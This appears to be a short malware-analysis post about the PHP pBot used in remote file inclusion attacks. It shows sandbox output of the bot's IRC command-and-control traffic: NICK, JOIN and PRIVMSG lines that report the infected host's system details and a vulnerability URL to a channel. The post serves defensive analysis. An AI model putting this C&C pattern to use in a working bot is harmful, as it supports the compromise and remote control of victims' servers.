I’m working on analyzing remote file inclusion (RFI) code. For pBot class which uses an IRF server as their command and control (C&C) , we are interested to get the IP addresses of the C&C, the channel name and the nickname used to connect to irc server.
Below are sample of output:
ok!
(host=irc.server_name.net, port=6667, , , 30)
( 1160 , “USER inul07429 127.0.0.1 localhost :Linux phpsBox 2.6.24-24-server #1 SMP Fri Sep 18 17:24:10 UTC 2009 i686 ” , )
( 1160 , “NICK [E]inul92112 ” , )
( 1160 , “MODE [E]inul92112 +ps” , )
( 1160 , “JOIN #knk !anime” , )
( 1160 , “PRIVMSG #trouxanime :[uname!]: Linux phpsBox 2.6.24-24-server #1 SMP Fri Sep 18 17:24:10 UTC 2009 i686 (safe: off)” , )
( 1160 , “PRIVMSG #trouxanime :[vuln!]: http://” , )
( 1160 , “NICK [E]inul97869” , )
( 1160 , “PONG :1508829909” , )
( 1160 , “PONG :1508829909” , )
( 1160 , “PONG :1508829909” , )
( 1160 , “PONG :1508829909” , )